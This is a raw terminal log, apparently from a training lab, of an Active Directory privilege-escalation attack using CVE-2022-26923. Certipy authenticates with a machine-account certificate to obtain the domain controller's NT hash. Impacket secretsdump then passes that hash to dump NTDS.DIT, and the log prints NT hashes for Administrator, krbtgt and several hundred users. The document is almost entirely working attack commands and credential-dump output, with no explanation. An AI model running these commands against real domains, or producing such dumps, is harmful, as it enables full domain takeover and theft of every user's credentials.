└─$ certipy-ad auth -pfx lundc.pfx
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: lundc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'lundc.ccache'
[*] Trying to retrieve NT hash for 'lundc$'
[*] Got hash for 'lundc$@lunar.eruca.com': aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733

lunar\thm@LUNDC C:\Users\thm>cd C:\THMTools 

lunar\thm@LUNDC C:\THMTools>dir 
 Volume in drive C is Windows 
 Volume Serial Number is 1634-22A9

 Directory of C:\THMTools

01/20/2022  03:35 PM    <DIR>          .
01/20/2022  03:35 PM    <DIR>          ..
10/22/2021  11:01 AM           417,280 Rubeus.exe
               1 File(s)        417,280 bytes
               2 Dir(s)  51,879,473,152 bytes free

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ /usr/share/doc/python3-impacket/examples/secretsdump.py 'lunar.eruca.com/LUNDC$@lundc.lunar.eruca.com' -hashes :14fc9b5814def64289bb694f6659c733
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:400da5ca40476e5aa7d2dbf542c6e5c3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3eb1bfbc55f798d7d38be7b92a8a140:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
gblake:1107:aad3b435b51404eeaad3b435b51404ee:fbfb5b320d017c9e3d3c634aaf4e54fd:::
lcarr:1108:aad3b435b51404eeaad3b435b51404ee:8825361f72915b1bf8dd0657027a9f7d:::
nmitchell:1109:aad3b435b51404eeaad3b435b51404ee:01db65871ad70a46a71afaf5bc9f0d27:::
ahughes:1110:aad3b435b51404eeaad3b435b51404ee:f89091b07e744e2454b1791bfd7e2ce2:::
iperry:1111:aad3b435b51404eeaad3b435b51404ee:8774f706e84284f8754f5aa7c4e0e939:::
lnorth:1112:aad3b435b51404eeaad3b435b51404ee:3500cc65d9919afc8c705af8b7531186:::
pmclean:1113:aad3b435b51404eeaad3b435b51404ee:e615cb3c4e870d63b50a62bf608452ee:::
dwright:1114:aad3b435b51404eeaad3b435b51404ee:05229ba25d66565f3759f682ba07c64f:::
vbennett:1115:aad3b435b51404eeaad3b435b51404ee:1aa365cc5adef169cfb52d7bdc5bce34:::
dpatel:1116:aad3b435b51404eeaad3b435b51404ee:8e1c1cfeb61921e3b4f761dd5b873e3c:::
rquinn:1117:aad3b435b51404eeaad3b435b51404ee:75435037599b7ad7f9180c04fbce2dfa:::
kwilson:1118:aad3b435b51404eeaad3b435b51404ee:4e3b2cf9b4386039b956a56ffacc13eb:::
gbibi:1119:aad3b435b51404eeaad3b435b51404ee:573aeb9a20ee5c275bf8d3b6bd445a59:::
scharlton:1120:aad3b435b51404eeaad3b435b51404ee:d21dc2ddb9edb61761ab6a0e34893a5f:::
vmartin:1121:aad3b435b51404eeaad3b435b51404ee:cb6cac268bda8fe37d921219ccf5ebe6:::
obaker:1122:aad3b435b51404eeaad3b435b51404ee:93f117d41b4b83785c1dbb9a33f8b8eb:::
jwebster:1123:aad3b435b51404eeaad3b435b51404ee:0f34d138ce347c237a793130ac04efda:::
dtaylor:1124:aad3b435b51404eeaad3b435b51404ee:619bdd254b904ee9829e28fbd97a0cf9:::
nwatts:1125:aad3b435b51404eeaad3b435b51404ee:007dcbfe7f14697be9ca69257e560f44:::
aroberts:1126:aad3b435b51404eeaad3b435b51404ee:46044d39258618f5771aa5e525562c07:::
jnorman:1127:aad3b435b51404eeaad3b435b51404ee:dff5d51c56eace216e311ae046a93b85:::
dobrien:1128:aad3b435b51404eeaad3b435b51404ee:163ecfb4468f7a411045f982c597b8a9:::
jowens:1129:aad3b435b51404eeaad3b435b51404ee:bf076c411f04220a685b61cf4ba1b599:::
avaughan:1130:aad3b435b51404eeaad3b435b51404ee:e443c6b00f6f3189ec300fa88471147e:::
gclayton:1131:aad3b435b51404eeaad3b435b51404ee:8f58f8420dd6305099f08fb2281743ee:::
lreynolds:1132:aad3b435b51404eeaad3b435b51404ee:1618d1c5d271a6cbc7e365786cd0be76:::
rarmstrong:1133:aad3b435b51404eeaad3b435b51404ee:59704080ece75632e8e4b5742c70d939:::
roconnor:1134:aad3b435b51404eeaad3b435b51404ee:1085189f705d864aec247f85d52e708d:::
cward:1135:aad3b435b51404eeaad3b435b51404ee:2da4a33ac9e76f6bc4b87b2b4c8f83a1:::
mcarter:1136:aad3b435b51404eeaad3b435b51404ee:c075739e0079bdb18762185f932ee7a7:::
mbennett:1137:aad3b435b51404eeaad3b435b51404ee:4ec61822b248156644b478091b36ccd4:::
epotter:1138:aad3b435b51404eeaad3b435b51404ee:618395c259b5fdc7a932ee76840e991b:::
srichards:1139:aad3b435b51404eeaad3b435b51404ee:011a867b5d2c9495219adb81449f43eb:::
mphillips:1140:aad3b435b51404eeaad3b435b51404ee:f294426a5a3cfdea7fbdd647a658068b:::
twatkins:1141:aad3b435b51404eeaad3b435b51404ee:2ef6834578807b6e7b188e7c2317b446:::
sfrancis:1142:aad3b435b51404eeaad3b435b51404ee:db1680338d03e6d3df15841d1c355f87:::
kwalters:1143:aad3b435b51404eeaad3b435b51404ee:d331a3b1de670a3f74942c2dfb40ff13:::
gbuckley:1144:aad3b435b51404eeaad3b435b51404ee:0332adb333e00933e4a40135d54faa4f:::
jsaunders:1145:aad3b435b51404eeaad3b435b51404ee:3bc3f3f91f864c34ecafe9b56b6af52c:::
rprice:1146:aad3b435b51404eeaad3b435b51404ee:f3b5b0470403e10d7c05188b027bab5b:::
ftalbot:1147:aad3b435b51404eeaad3b435b51404ee:8acc8349910db36a48059972f0559a09:::
ajackson:1148:aad3b435b51404eeaad3b435b51404ee:975b4ff7dfcbd466d2978fa826798f8a:::
mstokes:1149:aad3b435b51404eeaad3b435b51404ee:2c3118f42dbc6b6ed384c0e770c9a5ce:::
mroberts:1150:aad3b435b51404eeaad3b435b51404ee:6f0c609a133554c1642395faadc0336e:::
nwong:1151:aad3b435b51404eeaad3b435b51404ee:44936fe8514f3577db8d217f69f2ebf7:::
bdaniels:1152:aad3b435b51404eeaad3b435b51404ee:3da3f89e890dad186ddbd68d6c98c5b3:::
wpage:1153:aad3b435b51404eeaad3b435b51404ee:73dbd3b16760a5d417a5de825ca1f5b5:::
jhill:1154:aad3b435b51404eeaad3b435b51404ee:2310f0a1e7ac84d2e1dee4eca7985db7:::
whunter:1155:aad3b435b51404eeaad3b435b51404ee:a218c7f63768e71e307e8000f0a14a4e:::
jchapman:1156:aad3b435b51404eeaad3b435b51404ee:e317fe45bae39799c1fde9963679cb33:::
krobinson:1157:aad3b435b51404eeaad3b435b51404ee:b5b27b66dd32aa795fd76f3a26367ac3:::
chicks:1158:aad3b435b51404eeaad3b435b51404ee:7d3297f6ded95353f870f3c1e4ea75f3:::
jhall:1159:aad3b435b51404eeaad3b435b51404ee:a3fcf57ac6b911755572a166cd1459ac:::
wgardner:1160:aad3b435b51404eeaad3b435b51404ee:a3f35d06fefcdcdea7c055c9333a9009:::
jbuckley:1161:aad3b435b51404eeaad3b435b51404ee:96b461d2478717ec90e88fd9e6d2c9a6:::
spatterson:1162:aad3b435b51404eeaad3b435b51404ee:a926458ac4fd6c96069b189fde17afcc:::
swatts:1163:aad3b435b51404eeaad3b435b51404ee:690cee0fc8a79c893d1d9693238c308a:::
thughes:1164:aad3b435b51404eeaad3b435b51404ee:5850d3de6e07eb933c6b6dd047abe143:::
lwalsh:1165:aad3b435b51404eeaad3b435b51404ee:1668d8171220557bd36a57d77dcd1f61:::
jfaulkner:1166:aad3b435b51404eeaad3b435b51404ee:20b18064029937ffe95b67007bc0a159:::
ddavies:1167:aad3b435b51404eeaad3b435b51404ee:82b2c2ae03c4c185252ad8b2db1338ea:::
bhenderson:1168:aad3b435b51404eeaad3b435b51404ee:ac4ea189cb98c48cba1287aeb1a20d39:::
aroberts1:1169:aad3b435b51404eeaad3b435b51404ee:fa5f9ac6037dea7592b66202111bd678:::
rbell:1170:aad3b435b51404eeaad3b435b51404ee:481991d0b8aeca02758b569d1007b06d:::
adodd:1171:aad3b435b51404eeaad3b435b51404ee:a577da0564293e28d4fd56f150d43a1a:::
mclarke:1172:aad3b435b51404eeaad3b435b51404ee:7098d4bac1369d29df32799926c4908b:::
croberts:1173:aad3b435b51404eeaad3b435b51404ee:c0a18938527d9cae4b10993901468101:::
mjackson:1174:aad3b435b51404eeaad3b435b51404ee:90f6b0a53412a7b0e410ee391c5b67e5:::
dholloway:1175:aad3b435b51404eeaad3b435b51404ee:dd6cd1047a36bc76e628c7a8337d6f6d:::
asmith:1176:aad3b435b51404eeaad3b435b51404ee:d62b7e7ef87897d2d814b608d6299c6e:::
rlawrence:1177:aad3b435b51404eeaad3b435b51404ee:66d8fae9a0e8083159d392c416d5875d:::
speacock:1178:aad3b435b51404eeaad3b435b51404ee:5534bfd5e436dd07172ab555a75ed1ce:::
slewis:1179:aad3b435b51404eeaad3b435b51404ee:0f22f34ab540b03baa8422ceb94c5da5:::
bhowarth:1180:aad3b435b51404eeaad3b435b51404ee:b881d70b7fc8811a6ad822b25011d7d7:::
lcoates:1181:aad3b435b51404eeaad3b435b51404ee:789f023fdf00341df8cdc77680fd39df:::
rpage:1182:aad3b435b51404eeaad3b435b51404ee:2b92446ce821ca4042c8b9ea93ccfc53:::
ddavies1:1183:aad3b435b51404eeaad3b435b51404ee:84881fc859aae6cfd44f41fd1467f14e:::
groberts:1184:aad3b435b51404eeaad3b435b51404ee:57f766b3beb3c8c38f2a762b711cfec4:::
agray:1185:aad3b435b51404eeaad3b435b51404ee:bdb2168070066409c1e8a925376a3669:::
lclark:1186:aad3b435b51404eeaad3b435b51404ee:51936d533b822c59ee975d9350a23c61:::
thoward:1187:aad3b435b51404eeaad3b435b51404ee:3fcccc1b75a62a9a0eb9fea589418a7e:::
cjones:1188:aad3b435b51404eeaad3b435b51404ee:ab63a7339a1c0bb5476e66a6e6fe9aa5:::
lpeacock:1189:aad3b435b51404eeaad3b435b51404ee:1a74a538d720a1f21eb4f0f9518dc75d:::
emoss:1190:aad3b435b51404eeaad3b435b51404ee:00211875583e9c539e00dbdf52c4fef1:::
jchan:1191:aad3b435b51404eeaad3b435b51404ee:95adf6dc889bf0f5d452defdfe36c8fd:::
dnelson:1192:aad3b435b51404eeaad3b435b51404ee:22ae0475cfe1f86de969c48e29313b25:::
awhite:1193:aad3b435b51404eeaad3b435b51404ee:0034c3847b5b4562c7fefc0a68c87daf:::
dreid:1194:aad3b435b51404eeaad3b435b51404ee:6ea4c2c2c3fe4f45f8ff7bf7eb97fb02:::
lbrowne:1195:aad3b435b51404eeaad3b435b51404ee:8997c125ab3f75d5ed1902d96bdc26f5:::
jgilbert:1196:aad3b435b51404eeaad3b435b51404ee:2a16f249e67b694ff7fa42795a8ab0ce:::
mhodgson:1197:aad3b435b51404eeaad3b435b51404ee:0bc5aaa941f9962dd94fc5466a47755c:::
dmills:1198:aad3b435b51404eeaad3b435b51404ee:5feabaf9af031b645e342fd5e17bde5e:::
jcarey:1199:aad3b435b51404eeaad3b435b51404ee:6eea482c21c76e26bcbd5c5509a3c97e:::
gburrows:1200:aad3b435b51404eeaad3b435b51404ee:d2d6fd711b954fe36f683eba3fe907a1:::
ballen:1201:aad3b435b51404eeaad3b435b51404ee:3f7848ce38eeb6fccbe888530bf6f161:::
knixon:1202:aad3b435b51404eeaad3b435b51404ee:ba3ef3768d8d6c44996e399b48ea5693:::
mbegum:1203:aad3b435b51404eeaad3b435b51404ee:8f6d51c26adcd3371e5a7e6e6b0e082f:::
msmith:1204:aad3b435b51404eeaad3b435b51404ee:fc8df4dab576765d0c311e34cb2d3065:::
mkerr:1205:aad3b435b51404eeaad3b435b51404ee:c91e6e67bb4ab9d8a46faf1cd0c2b55a:::
bmitchell:1206:aad3b435b51404eeaad3b435b51404ee:e4fdfed281d27a02bdb597dfe965a54f:::
sallan:1207:aad3b435b51404eeaad3b435b51404ee:219ebce2edb9a3282e008280ab30c81f:::
vhussain:1208:aad3b435b51404eeaad3b435b51404ee:b1623f1b41fc999072bea61ea70a5c49:::
lthompson:1209:aad3b435b51404eeaad3b435b51404ee:2c8aa68dda857cae82466941131b02f4:::
ljones:1210:aad3b435b51404eeaad3b435b51404ee:0ee26c3a1c2c03c566b435a1b696da7c:::
jmorgan:1211:aad3b435b51404eeaad3b435b51404ee:9a074190799430a5c7ed2cb228f66927:::
mmccarthy:1212:aad3b435b51404eeaad3b435b51404ee:c87192a555efcb59dd4a4fee6b25d28c:::
gellis:1213:aad3b435b51404eeaad3b435b51404ee:7313d28fe8d084e2d112fee13a3ed714:::
ledwards:1214:aad3b435b51404eeaad3b435b51404ee:f83ee5cbbad6ab3ed99fc25a15dab836:::
vbennett1:1215:aad3b435b51404eeaad3b435b51404ee:b6e49eb1c0bdeb814e53a48deeb63dd8:::
nfreeman:1216:aad3b435b51404eeaad3b435b51404ee:0aca2f14b58bfa1c64aea81e6889f7c5:::
rdavies:1217:aad3b435b51404eeaad3b435b51404ee:6e73be88952c92b86d7d10852a33c02b:::
ccarter:1218:aad3b435b51404eeaad3b435b51404ee:f9f7df851a339376022f71d79dc5eab4:::
ssteele:1219:aad3b435b51404eeaad3b435b51404ee:2efb6a7e0a9fab9bd62891cf5c7f3de5:::
iburns:1220:aad3b435b51404eeaad3b435b51404ee:cf59a0683b90f869d10f716f428445b2:::
lsmith:1221:aad3b435b51404eeaad3b435b51404ee:35d1bf950c27214a9bbafc44ac6e9941:::
kkelly:1222:aad3b435b51404eeaad3b435b51404ee:8eab6eed81bb2c89484d0752fcb28c41:::
jjohnston:1223:aad3b435b51404eeaad3b435b51404ee:b6d0d30495d9582450cc90bf67a6cc58:::
dbrown:1224:aad3b435b51404eeaad3b435b51404ee:53b385960fd379432baf6285b2abbb5b:::
jpritchard:1225:aad3b435b51404eeaad3b435b51404ee:ec7230af402e677f4d0902623ea18e08:::
msinclair:1226:aad3b435b51404eeaad3b435b51404ee:7f7c31ac7e5f8986c0957db7c4bf7cd7:::
jjohnson:1227:aad3b435b51404eeaad3b435b51404ee:1e59c1ca0c058f37358ea05759d7a686:::
brogers:1228:aad3b435b51404eeaad3b435b51404ee:7350d284a88fc9a10cf88e9dc9fde3d4:::
bgordon:1229:aad3b435b51404eeaad3b435b51404ee:0efcceef45e02a469c21356c92ba123b:::
rgibbs:1230:aad3b435b51404eeaad3b435b51404ee:6e3d3409e221417ea369a5ad2238c6b1:::
bobrien:1231:aad3b435b51404eeaad3b435b51404ee:7fb23b04d0d378d13fb7334080a5560a:::
mdavidson:1232:aad3b435b51404eeaad3b435b51404ee:f604b70951917733efec8ba7cb616014:::
lhughes:1233:aad3b435b51404eeaad3b435b51404ee:960aae0164f108028641652c9d065e2f:::
jevans:1234:aad3b435b51404eeaad3b435b51404ee:fa9294bfe5a591983149f35e6d4e2dec:::
bjennings:1235:aad3b435b51404eeaad3b435b51404ee:cd88b9c1558342fd97cd016379e86d96:::
aharris:1236:aad3b435b51404eeaad3b435b51404ee:f7f513c34a4aa690b22e4dfd6416b9c9:::
bhawkins:1237:aad3b435b51404eeaad3b435b51404ee:b08a7c3681c7d995048c87b4878d2cac:::
sjones:1238:aad3b435b51404eeaad3b435b51404ee:42555138509d3b898666ebf4200a2b73:::
lowen:1239:aad3b435b51404eeaad3b435b51404ee:85c85fcd1b58dce3422c1a6b1c8c9e9a:::
mcarter1:1240:aad3b435b51404eeaad3b435b51404ee:b56058343e80228e4d88b3b0716a9242:::
jwilson:1241:aad3b435b51404eeaad3b435b51404ee:dab6e89e22e3315344b7451acb6452bb:::
rdyer:1242:aad3b435b51404eeaad3b435b51404ee:534875bc376eccc2ac8f529a4a717d90:::
gthompson:1243:aad3b435b51404eeaad3b435b51404ee:b055a12c307c7876a6652b374f16b987:::
vparker:1244:aad3b435b51404eeaad3b435b51404ee:df158195df043800f1e2e6f616b61cb4:::
mahmed:1245:aad3b435b51404eeaad3b435b51404ee:475a914d4ac5c606def32f367b6e613b:::
mthornton:1246:aad3b435b51404eeaad3b435b51404ee:16072f40f48bf8520742c812037c2406:::
ecollins:1247:aad3b435b51404eeaad3b435b51404ee:7ef44a7160ff731df6e0113fcc95297f:::
charris:1248:aad3b435b51404eeaad3b435b51404ee:ff9d8678146fb7ddaf5f1de4d78c4834:::
jfisher:1249:aad3b435b51404eeaad3b435b51404ee:e5d46d511b16d73cc06af6891e933512:::
mjones:1250:aad3b435b51404eeaad3b435b51404ee:834dac9b4cfc7d4532812f330b028de7:::
ctaylor:1251:aad3b435b51404eeaad3b435b51404ee:b14cb3224b8cb64df75fcb345702d204:::
fhopkins:1252:aad3b435b51404eeaad3b435b51404ee:a4ef5fdf68ef69427846970a2a01ef7a:::
jhilton:1253:aad3b435b51404eeaad3b435b51404ee:c1e21d45c2dea27067a9a514c44c0408:::
bdobson:1254:aad3b435b51404eeaad3b435b51404ee:1c1a33551efc707705754a22998cba2a:::
msmith1:1255:aad3b435b51404eeaad3b435b51404ee:e7653ade32c8a5c73e1643913f49ba3e:::
mhughes:1256:aad3b435b51404eeaad3b435b51404ee:ea231c9a338bcc1e487a63f234051dfc:::
etomlinson:1257:aad3b435b51404eeaad3b435b51404ee:f0ea9f5a3f9c6de4c730a26a2e337dd3:::
sbailey:1258:aad3b435b51404eeaad3b435b51404ee:c7061617700e9352f3b9a21f33c13653:::
cpalmer:1259:aad3b435b51404eeaad3b435b51404ee:c3ae8296274b717ec8912dd2127b2c3f:::
cwallis:1260:aad3b435b51404eeaad3b435b51404ee:9c51165ce87b643e33606e982964c1f8:::
staylor:1261:aad3b435b51404eeaad3b435b51404ee:9dec9210f6c40d99fc9d4cb95e779793:::
mwalker:1262:aad3b435b51404eeaad3b435b51404ee:87f313cc2d7f09d1576c5f55c6aa69c1:::
jchapman1:1263:aad3b435b51404eeaad3b435b51404ee:8bdf14a817e86d69cca3bfa9c746b1be:::
edixon:1264:aad3b435b51404eeaad3b435b51404ee:4b3fb2223572e8f6065fcdb420f64a71:::
hbegum:1265:aad3b435b51404eeaad3b435b51404ee:3c1f1b9e43e5dc16edce28eb6c47911e:::
dwilliams:1266:aad3b435b51404eeaad3b435b51404ee:4e39af5389e7caebfeef98470a0b3f93:::
bturner:1267:aad3b435b51404eeaad3b435b51404ee:aa3cac0d40db371676397974a2104ca2:::
kwallace:1268:aad3b435b51404eeaad3b435b51404ee:71db64e8c189b12da570613ec9999900:::
dthompson:1269:aad3b435b51404eeaad3b435b51404ee:b8f8c915e600be0e47ea53c8ce97e2d1:::
bclark:1270:aad3b435b51404eeaad3b435b51404ee:e873f13154d9d95bfa567eddea52e0fe:::
ojohnson:1271:aad3b435b51404eeaad3b435b51404ee:e8d65ea251744b4b22e080ec5a9c1e7b:::
dsmith:1272:aad3b435b51404eeaad3b435b51404ee:7169eabadad8b4686c82dfe32e5d3f6c:::
pallen:1273:aad3b435b51404eeaad3b435b51404ee:a0405d913993d4e7b03f66ef1a7dded0:::
amarsh:1274:aad3b435b51404eeaad3b435b51404ee:e3bbc4e20402f5cec51291905a6ea23e:::
troberts:1275:aad3b435b51404eeaad3b435b51404ee:246a7c0df510cd3bfac1ee741024a0a2:::
wrichardson:1276:aad3b435b51404eeaad3b435b51404ee:bfacbac303c04e28f1c9255b42e8eeb3:::
hcoles:1277:aad3b435b51404eeaad3b435b51404ee:da80819762c174878aea9ac75f100249:::
jlittle:1278:aad3b435b51404eeaad3b435b51404ee:25c5b7a15b2d1e15037e31cff8c00b7c:::
pbenson:1279:aad3b435b51404eeaad3b435b51404ee:d233f1728c8d9154b4009f5abe76a1cc:::
smay:1280:aad3b435b51404eeaad3b435b51404ee:5cb407010861fc8d8020dd46ce4d37a7:::
mreeves:1281:aad3b435b51404eeaad3b435b51404ee:0f54c1c3d49d204b6339a63ff1208bf5:::
fcooper:1282:aad3b435b51404eeaad3b435b51404ee:3f16e0e727368c43c3e207cc6d3d294e:::
dwright1:1283:aad3b435b51404eeaad3b435b51404ee:156ccb27ed832306d8c7e332e7119bdf:::
nthompson:1284:aad3b435b51404eeaad3b435b51404ee:5d6638a5052c75e55ccffca436beab0c:::
anewton:1285:aad3b435b51404eeaad3b435b51404ee:7711c138f87b6d590f45818eb6eca0ee:::
ejohnston:1286:aad3b435b51404eeaad3b435b51404ee:591377f0af994076da3a9631324a48ff:::
alawrence:1287:aad3b435b51404eeaad3b435b51404ee:920cb40bda362fe036984048419305d7:::
awells:1288:aad3b435b51404eeaad3b435b51404ee:e00b704b19444dd3a4e0c3375b4d1cb2:::
jbull:1289:aad3b435b51404eeaad3b435b51404ee:9331344658b5e564ac8e7bbff8f6c657:::
onorth:1290:aad3b435b51404eeaad3b435b51404ee:d025f1c83e16c0662f9307e37de2a421:::
dwatson:1291:aad3b435b51404eeaad3b435b51404ee:529d51d8feaa820598bf64e0db507940:::
cwhite:1292:aad3b435b51404eeaad3b435b51404ee:85a2154ff677bcf599ff4e85a2eb5be5:::
sallan1:1293:aad3b435b51404eeaad3b435b51404ee:f37110c331362e364d543d0814f0354e:::
chall:1294:aad3b435b51404eeaad3b435b51404ee:61bbc837012539059aac48975d461c24:::
rwarner:1295:aad3b435b51404eeaad3b435b51404ee:7b9647d32d92eb93fb63d884ebd32e6d:::
hkemp:1296:aad3b435b51404eeaad3b435b51404ee:944595e4db4731201809c28644522c67:::
aburrows:1297:aad3b435b51404eeaad3b435b51404ee:6f196a75d1bfc7afa5516820f45160c3:::
jchapman2:1298:aad3b435b51404eeaad3b435b51404ee:1c8c278ac0a1ad01f81432f801524f26:::
joneill:1299:aad3b435b51404eeaad3b435b51404ee:c4bcf7da5aabf6a7953a5f5fb88f9ec5:::
egoodwin:1300:aad3b435b51404eeaad3b435b51404ee:efd51ca2672295d605370dffa7bddb1f:::
pnash:1301:aad3b435b51404eeaad3b435b51404ee:3f753302b2b4d339d54d4d4f68e5d157:::
kpayne:1302:aad3b435b51404eeaad3b435b51404ee:f1cb2443c770ecadfa4b4541d4062554:::
bjoyce:1303:aad3b435b51404eeaad3b435b51404ee:deb933118e9e2f6b878894d7d43fbb64:::
sbarber:1304:aad3b435b51404eeaad3b435b51404ee:17bc1aa07eb1b7b6b0a7923a7c1878bd:::
tclarke:1305:aad3b435b51404eeaad3b435b51404ee:62a87cce7d75dc5dc6abf27fffc37fb9:::
fhall:1306:aad3b435b51404eeaad3b435b51404ee:1bacb3f43e875f82805844abff6a6cf2:::
mwhite:1307:aad3b435b51404eeaad3b435b51404ee:93aff8da4cfccfe907a70a394739aa60:::
kallen:1308:aad3b435b51404eeaad3b435b51404ee:ff0607bb94f1ec3b919993bcf5e45479:::
joliver:1309:aad3b435b51404eeaad3b435b51404ee:eaa5bf2e18d8f178ec9f4d246e5d4140:::
awheeler:1310:aad3b435b51404eeaad3b435b51404ee:8ceae3f31dd61a0a0b6df17154f3c044:::
fevans:1311:aad3b435b51404eeaad3b435b51404ee:1ba16ab6fa822b15ddd6d46e5173ed65:::
gsimpson:1312:aad3b435b51404eeaad3b435b51404ee:5b074ae14cb8b643206a65b10a3beecf:::
jpearson:1313:aad3b435b51404eeaad3b435b51404ee:05f25283a571597e5c19982f6cceeb05:::
rakhtar:1314:aad3b435b51404eeaad3b435b51404ee:fc9fc1c580279d3242d938db5c70fbc0:::
njones:1315:aad3b435b51404eeaad3b435b51404ee:9766eace55d1c4bf58e6f23d03dbcb96:::
jgreen:1316:aad3b435b51404eeaad3b435b51404ee:36141937090b0298512de4b699e66c42:::
tjackson:1317:aad3b435b51404eeaad3b435b51404ee:a999b16085665503b19fc6cd688f17e8:::
nnash:1318:aad3b435b51404eeaad3b435b51404ee:24981d4fcd9d5c7a5ac9c555c28a1467:::
cbennett:1319:aad3b435b51404eeaad3b435b51404ee:511867e4737d92481d3440a296b85158:::
ghartley:1320:aad3b435b51404eeaad3b435b51404ee:d3b43d0f8cdcb6d2cedea5359d124934:::
asmith1:1321:aad3b435b51404eeaad3b435b51404ee:a613afd5443a126eb9854eb6a70e956e:::
rparker:1322:aad3b435b51404eeaad3b435b51404ee:f70134d0bc190ced70240b7171069733:::
dwelch:1323:aad3b435b51404eeaad3b435b51404ee:4a9764fabc08f1125c16b6dcfe72772a:::
ktaylor:1324:aad3b435b51404eeaad3b435b51404ee:25b4e4c5c9c38891a944294095ecae6a:::
lwilliams:1325:aad3b435b51404eeaad3b435b51404ee:bf49120fb5cecf1cc97f15af00582b74:::
jmatthews:1326:aad3b435b51404eeaad3b435b51404ee:fedf6e24aa1fd2d35bd25dcf39c53a1e:::
mnorth:1327:aad3b435b51404eeaad3b435b51404ee:c69643944ebe4c4dca58862fee5e286d:::
brhodes:1328:aad3b435b51404eeaad3b435b51404ee:d897d77746f87e699c8d472d2852f16b:::
lwheeler:1329:aad3b435b51404eeaad3b435b51404ee:c2f030d0506580cf6e3306d7893a0717:::
vreid:1330:aad3b435b51404eeaad3b435b51404ee:9b993f79f1cbd35a0d4cdcb39ab0d5f5:::
jnelson:1331:aad3b435b51404eeaad3b435b51404ee:8edaf327b6600e89ccb05a069b4fa52e:::
dslater:1332:aad3b435b51404eeaad3b435b51404ee:81d469fa33e6d19bfc98d9c41629c2a0:::
mryan:1333:aad3b435b51404eeaad3b435b51404ee:ccf53268c51e58d4797e88b10058e538:::
rwilliams:1334:aad3b435b51404eeaad3b435b51404ee:d012cb2a33c4a847752b83ac7a078170:::
mroberts1:1335:aad3b435b51404eeaad3b435b51404ee:25ad0e16f3f7f5d41162112970cf208e:::
mfoster:1336:aad3b435b51404eeaad3b435b51404ee:2040d03b8fcef5fa10f938afcf85f70e:::
hcox:1337:aad3b435b51404eeaad3b435b51404ee:f6008a80f4dd0a24c0e4ef8d9fd65cdd:::
cjones1:1338:aad3b435b51404eeaad3b435b51404ee:b8a8197b691c90fac0a6d43eb7e88b9a:::
pwells:1339:aad3b435b51404eeaad3b435b51404ee:f23bda5fc87be62bacdc7fa6816cb65c:::
mmurphy:1340:aad3b435b51404eeaad3b435b51404ee:4d077cb7cdb79fde3a6156c6221f7f2c:::
shall:1341:aad3b435b51404eeaad3b435b51404ee:bcbc95e56ce717b3206aa93af8d4d564:::
phope:1342:aad3b435b51404eeaad3b435b51404ee:3824fe1b4673e07f669f5d506f756360:::
wjones:1343:aad3b435b51404eeaad3b435b51404ee:86e51bee7945194d4cc84bc148398588:::
mpearson:1344:aad3b435b51404eeaad3b435b51404ee:2b5b66d3c04ffcf08ed11b2a92e798c4:::
levans:1345:aad3b435b51404eeaad3b435b51404ee:4048ded1ebe6d57f3f79f2fe227fe9f3:::
hgreenwood:1346:aad3b435b51404eeaad3b435b51404ee:7921a4dc80df706f7653e2ad17a574f9:::
vwilson:1347:aad3b435b51404eeaad3b435b51404ee:4eaffbe9f2b9e70f75e6130e151590c2:::
gsaunders:1348:aad3b435b51404eeaad3b435b51404ee:305eb1b887c057a4ce79b316a8cddbca:::
ebarrett:1349:aad3b435b51404eeaad3b435b51404ee:6b4d205e0d84417cc0c03604d7c0ee83:::
dbarry:1350:aad3b435b51404eeaad3b435b51404ee:3dcc43e330b77339b90c8a4cb7d2628d:::
gjenkins:1351:aad3b435b51404eeaad3b435b51404ee:6ff4e462722b3080b9c28d677fbb577b:::
tmitchell:1352:aad3b435b51404eeaad3b435b51404ee:36469ec9062401b539594cf515c5e9d1:::
jwhite:1353:aad3b435b51404eeaad3b435b51404ee:7f15a22b7f69ce7e98e5c6aaa9c2ca0b:::
abrady:1354:aad3b435b51404eeaad3b435b51404ee:612fc0c64c9557c70a7619b07b1ad6d4:::
akemp:1355:aad3b435b51404eeaad3b435b51404ee:b06e933a4b079b6a3a5f32db16f2de33:::
flloyd:1356:aad3b435b51404eeaad3b435b51404ee:5703978c8814be06a7a8e231caed5a7b:::
tsimpson:1357:aad3b435b51404eeaad3b435b51404ee:0ad3d6c9039277353d223e4befd9ea09:::
gtalbot:1358:aad3b435b51404eeaad3b435b51404ee:1bf605d9519530065ff5005e89de792c:::
swatson:1359:aad3b435b51404eeaad3b435b51404ee:e65755a4373c8a432be16f20a3d00aa8:::
gclements:1360:aad3b435b51404eeaad3b435b51404ee:5423a96e1c010602c56cdb41e8ea2d05:::
alewis:1361:aad3b435b51404eeaad3b435b51404ee:697547e4951e1dfebaa29e311b09d2ba:::
hmartin:1362:aad3b435b51404eeaad3b435b51404ee:daa8b6a71579791b8ed9f6ad38f50277:::
cwatson:1363:aad3b435b51404eeaad3b435b51404ee:97792093217e2b7cfcd295ebcd77b75c:::
mgordon:1364:aad3b435b51404eeaad3b435b51404ee:8274d0a8a3908ab1e1436acf4d086c60:::
smorris:1365:aad3b435b51404eeaad3b435b51404ee:b2ae9715300efcef8fea13d0c60123e0:::
hsykes:1366:aad3b435b51404eeaad3b435b51404ee:e3758db5125adf863881e3025b8350ad:::
ssaunders:1367:aad3b435b51404eeaad3b435b51404ee:3e2f467ecd98f02eebf4c68f295b6fcb:::
jphillips:1368:aad3b435b51404eeaad3b435b51404ee:0ea2d6007b571fa009c6fe3f02820dea:::
sford:1369:aad3b435b51404eeaad3b435b51404ee:49ed236f29cf64e56c80475461dffbad:::
kcarroll:1370:aad3b435b51404eeaad3b435b51404ee:286c560664763d19e441c70bf3bfb0fa:::
hgardner:1371:aad3b435b51404eeaad3b435b51404ee:c6e02bda8bad6bd9712f8933234c5616:::
